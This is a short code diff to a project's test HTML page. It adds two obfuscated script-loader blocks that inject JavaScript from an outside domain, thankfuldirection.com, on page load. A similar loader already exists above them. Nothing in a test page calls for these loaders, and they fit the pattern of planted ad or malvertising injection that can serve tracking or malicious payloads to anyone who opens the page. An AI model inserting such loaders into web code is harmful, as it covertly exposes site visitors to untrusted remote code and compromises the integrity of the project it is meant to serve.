--- a/tests/index.html
+++ b/tests/index.html
@@ -78,6 +78,30 @@ s.referrerPolicy = 'no-referrer-when-downgrade';
 l.parentNode.insertBefore(s, l);
 })({})
 </script>
+<script>
+(function(akh){
+var d = document,
+    s = d.createElement('script'),
+    l = d.scripts[d.scripts.length - 1];
+s.settings = akh || {};
+s.src = "\/\/thankfuldirection.com\/b\/XNVKs.dyGllC0WYUW\/cH\/Ferm\/9\/uJZDUBl\/kxP\/TOYX3gNuDQgJ2QNpTec-tHNrjWcu0COCDvYv1QOrAS";
+s.async = true;
+s.referrerPolicy = 'no-referrer-when-downgrade';
+l.parentNode.insertBefore(s, l);
+})({})
+</script>
+<script>
+(function(kds){
+var d = document,
+    s = d.createElement('script'),
+    l = d.scripts[d.scripts.length - 1];
+s.settings = kds || {};
+s.src = "\/\/thankfuldirection.com\/bLXoV.s_duGhla0JYtWvcr\/-egmX9TukZGUhlCkbP\/T\/Yd3INSDog\/2cNTjoEht\/NGj\/c_0JOuD\/Yx2PMngK";
+s.async = true;
+s.referrerPolicy = 'no-referrer-when-downgrade';
+l.parentNode.insertBefore(s, l);
+})({})
+</script>
 <main>
 
     <header>
